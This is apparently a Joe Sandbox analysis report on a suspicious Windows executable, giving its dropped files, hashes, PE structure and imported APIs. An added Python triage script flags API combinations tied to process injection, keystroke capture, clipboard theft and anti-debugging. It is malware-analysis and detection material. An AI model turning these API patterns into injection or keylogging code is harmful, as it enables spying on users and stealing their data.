                      Preview:..u..3RNC...\..d.V4..m3R...NCFU1UFOJEXEV7QILE0ZO3RNCFU1UF.JEXKI._I.L.{.2..b.=X&f?8*?77Zq*-+^5;.0+c4 _u/!j...vZ>-)k=WE.RNCFU1U?NC.e%1.l)+..:(.H..oQ2.U..y6P.S...f/T..*%=.5!.JEXEV7QI..0Z.2SNi".iUFOJEXEV.QKMN1QO3.JCFU1UFOJExQV7QYLE0*K3RN.FU!UFOHEXCV7QILE0\O3RNCFU1%BOJGXEV7QINEp.O3BNCVU1UF_JEHEV7QILU0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXk"R)=LE0^.7RNSFU1.BOJUXEV7QILE0ZO3RNcFUQUFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU
                      Process:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):14502
                      Entropy (8bit):7.6194755282159985
                      Encrypted:false
                      SSDEEP:384:fKlUKTgVbU+n6BmD89zY14FrJMz8omo7LC1:fKlUKi4i1w2Q6y
                      MD5:E2A2D367E6B998962F5FCEDD000E0260
                      SHA1:89C2C43AE8EE439726FF80499057BCECB3B0EC69
                      SHA-256:D2890512351C2F74A855123B14D3494676E6F7B020342B231E4053BEABBF1BB0
                      SHA-512:F9E3A657871992F189CACF874C5F0E3ABE79B8FBA802662D243716D9F16766EF5A4699AC2DFF67302F0ADA26F858A3E2033EB10A915AED4A7F7A92BA1976A821
                      Malicious:false
                      Reputation:low
                      Preview:EA06..0..M...../...c..f@.[....P.].@.[..+8.2.f`........e..:......7..7..#|Sp.....?. ... .....|. ..`....C.j.}.X..75.}......`.}.@(>...Y..w4.m....0....,.....}|.0....r............._|S.*......0.o..w...F...;...|60).....|3@...h.Q.L@%.7.......7.T.g.*.5..?.......2.F.g.......5.f...y4.^...>p......B...|.._...?v`Q......M....(...=.....c...f.....W.9......3._.@..e...A..k ...a....O>).4..f.}..?...3 ....C......#.X.g.8.... 6.......1.Y.F?.....Gc.....@#...........l`F..E..c........#..]..c...A....<|.....<~.._.]..........y4...@.~{02/.3...._4...v .O.....|.@jO......M..>`.......|.~....,.m.X..&.........>.. >p5....<~.P....a..@..9.Z.,.X.X...4.,...O~p..L.C....A..2.......p&.....K..@..b....@..X.G.3.............. ..?..@|.._<..C....|.P...n.y..@...).j.+.X.->..(..a.&.l......k......>p........X..P!~M..>`./...-..#?......#.^|._.....[....| 7...g.0.h.,aU_.B....Y...}..<...| ..<........|>)..V.....$........B~..A.......|V ./....)_.4..S..J.@H...7..<#.....~3p............> g/..o. ...d).....`5...W..%..D..
                      Process:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      File Type:ASCII text, with very long lines (65536), with no line terminators
                      Category:dropped
                      Size (bytes):143370
                      Entropy (8bit):2.6635439737859765
                      Encrypted:false
                      SSDEEP:384:qrYq11YnBr4syyK6/nbWHHnv+ml+uGYNb3WUgQNm0LYQ:4
                      MD5:F654070822A72E49D2736DB338C9CF67
                      SHA1:0BDD7830B96EFF994443226E42341ADDFA2EFF56
                      SHA-256:172337F9788D3B2A89E4BF6A8EF263930C4F7C87740DAE6DED84E454FBC0B639
                      SHA-512:5077A079CBDA6321DF08574566D8F14B367F98A07ECA703FB219B74463C4144DF0A4726EC51B595B45D6F8113DB3512EFD0A1D21C03318925CE3D5B539C805AA
                      Malicious:false
                      Preview:06504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504c650426504c6504d65045650456504e6504b65048650406504c650436504365042650406504b6504e6504c6504f65045650446504b6504865040650406504065040650406504065040650406504c6504f6504565044650476504c65047650406504b6504e6504c6504f6504d650446504965048650486504f6504d650446504b6504865048650406504465047650406504c65045650486504065040650406504065040650406504c6504865045650496504f6504f6504f6504f6504a650466504065045650486504f65045650446504d650486504465042650446504765040650406504
                      Process:C:\Windows\SysWOW64\chkntfs.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.135919783223942
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:p4LNUqyKZM.exe
                      File size:1'250'816 bytes
                      MD5:4214be98801c44f69b60490a3321e940
                      SHA1:df33635a4f458821d10ce62860a043a960ced09f
                      SHA256:416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07
                      SHA512:4f24a5ab7dc49ebbccae771dacdd4dd630d57b5691790527f2896d6547318edc846b4bb294b7cf49cc156c234a8d38fc9511c782d7008538b419d626c2d5d413
                      SSDEEP:24576:vqDEvCTbMWu7rQYlBQcBiT6rprG8aVnLgmDaEBVycKdrd8gx:vTvC/MTQYxsWR7aVnLv2msrSg
                      TLSH:A745CF0273D1C062FF9B92334F5AE6515BBC69260123E61F13A81DB9BE701B1563E7A3
                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                      Icon Hash:aaf3e3e3938382a0
                      Entrypoint:0x420577
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66D4F8E6 [Sun Sep 1 23:29:42 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:948cc502fe9226992dce9417f952fce3
                      Instruction
                      call 00007F48C0BE4BF3h
                      jmp 00007F48C0BE44FFh
                      push ebp
                      mov ebp, esp
                      push esi
                      push dword ptr [ebp+08h]
                      mov esi, ecx
                      call 00007F48C0BE46DDh
                      mov dword ptr [esi], 0049FDF0h
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      and dword ptr [ecx+04h], 00000000h
                      mov eax, ecx
                      and dword ptr [ecx+08h], 00000000h
                      mov dword ptr [ecx+04h], 0049FDF8h
                      mov dword ptr [ecx], 0049FDF0h
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      push dword ptr [ebp+08h]
                      mov esi, ecx
                      call 00007F48C0BE46AAh
                      mov dword ptr [esi], 0049FE0Ch
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      and dword ptr [ecx+04h], 00000000h
                      mov eax, ecx
                      and dword ptr [ecx+08h], 00000000h
                      mov dword ptr [ecx+04h], 0049FE14h
                      mov dword ptr [ecx], 0049FE0Ch
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, ecx
                      lea eax, dword ptr [esi+04h]
                      mov dword ptr [esi], 0049FDD0h
                      and dword ptr [eax], 00000000h
                      and dword ptr [eax+04h], 00000000h
                      push eax
                      mov eax, dword ptr [ebp+08h]
                      add eax, 04h
                      push eax
                      call 00007F48C0BE729Dh
                      pop ecx
                      pop ecx
                      mov eax, esi
                      pop esi
                      pop ebp
                      retn 0004h
                      lea eax, dword ptr [ecx+04h]
                      mov dword ptr [ecx], 0049FDD0h
                      push eax
                      call 00007F48C0BE72E8h
                      pop ecx
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, ecx
                      lea eax, dword ptr [esi+04h]
                      mov dword ptr [esi], 0049FDD0h
                      push eax
                      call 00007F48C0BE72D1h
                      test byte ptr [ebp+08h], 00000001h
                      pop ecx
                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x5ab0c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12f000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x5ab0c | 0x5ac00 | 8b0b669b687608340c32630295e56c2f | False | 0.9275891012396694 | data | 7.893638866117766 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12f000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x51dd2 | data | | | 1.0003310330019026
RT_GROUP_ICON | 0x12e58c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12e604 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x12e618 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12e62c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x12e640 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x12e71c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, 
GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
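Import triage over rows like the ones above, as an added example that is not part of the Joe Sandbox report: it parses rows in the form the report renders them (including the fused "KERNEL32.dllDuplicateHandle, ..." form a scrape of the HTML produces), fires only on conjunctions of APIs rather than single names, and separates what the import table proves from what it cannot rule out. The capability groupings and the excerpted rows (cut down to the APIs the rules look at) are the editor's; the API names are standard Win32 exports.

```python
"""Static import-table triage: map imported Win32 APIs to the capabilities
they enable. Added example; the capability groupings are the editor's, not
Joe Sandbox's."""
import re

# Excerpt of the import rows from the table above, shortened to the APIs the
# rules look at. Both "DLL: A, B" and the fused "DLLA, B" form are accepted.
IMPORT_ROWS = [
    "KERNEL32.dllDuplicateHandle, CreateThread, IsWow64Process, LoadLibraryA, "
    "GetProcAddress, QueryPerformanceCounter, OpenProcess, VirtualAllocEx, "
    "WriteProcessMemory, ReadProcessMemory, CreateToolhelp32Snapshot, "
    "Process32FirstW, Process32NextW, IsDebuggerPresent, OutputDebugStringW",
    "USER32.dll: GetAsyncKeyState, GetKeyboardState, GetKeyState, SendInput, "
    "mouse_event, keybd_event, BlockInput, OpenClipboard, GetClipboardData, "
    "SetClipboardData, AttachThreadInput, ExitWindowsEx",
    "ADVAPI32.dll: AdjustTokenPrivileges, OpenProcessToken, LookupPrivilegeValueW, "
    "DuplicateTokenEx, CreateProcessAsUserW, LogonUserW, InitiateSystemShutdownExW",
]

# A rule fires only when every API it lists is imported. Keep rules as small
# conjunctions: a lone VirtualAllocEx is noise, the three together are not.
RULES = {
    "remote memory write (injection primitive)": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"},
    "remote thread creation": {"CreateRemoteThread"},
    "dynamic API resolution": {"GetProcAddress"},
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "debugger check": {"IsDebuggerPresent"},
    "high-resolution timing (timing-based debugger/sandbox checks)": {"QueryPerformanceCounter"},
    "input blocking": {"BlockInput"},
    "keystroke capture and synthesis": {"GetAsyncKeyState", "SendInput"},
    "clipboard read": {"OpenClipboard", "GetClipboardData"},
    "token privilege adjustment": {"OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "run process as another user": {"LogonUserW", "CreateProcessAsUserW"},
}

# DLL name (lazy, so "KERNEL32.dll" stops at the first ".dll"), optional colon,
# then the comma-separated export list.
_ROW = re.compile(r"^\s*(?P<dll>[\w.-]+?\.dll):?\s*(?P<funcs>.*?)\s*$", re.IGNORECASE)


def parse_import_row(row):
    """Return (dll, [function, ...]) for one import row."""
    m = _ROW.match(row)
    if not m:
        raise ValueError(f"not an import row: {row[:40]!r}")
    funcs = [f.strip() for f in m.group("funcs").split(",") if f.strip()]
    return m.group("dll"), funcs


def triage(rows):
    """Map capability name -> sorted 'DLL!Function' list for every rule whose
    APIs are all present in the import table."""
    where = {}                      # function name -> exporting DLL
    for row in rows:
        dll, funcs = parse_import_row(row)
        for f in funcs:
            where[f] = dll
    hits = {}
    for cap, needed in RULES.items():
        if needed.issubset(where):
            hits[cap] = sorted(f"{where[f]}!{f}" for f in needed)
    return hits


def unproven_absences(rows):
    """Rules that did not fire but cannot be ruled out: once GetProcAddress is
    imported the real API set is decided at run time, and code that uses
    direct syscalls never imports anything at all."""
    hits = triage(rows)
    if "dynamic API resolution" not in hits:
        return []
    return sorted(cap for cap in RULES if cap not in hits)


if __name__ == "__main__":
    for cap, apis in triage(IMPORT_ROWS).items():
        print(f"{cap}: {', '.join(apis)}")
    print("not provable from imports alone:", unproven_absences(IMPORT_ROWS))
```

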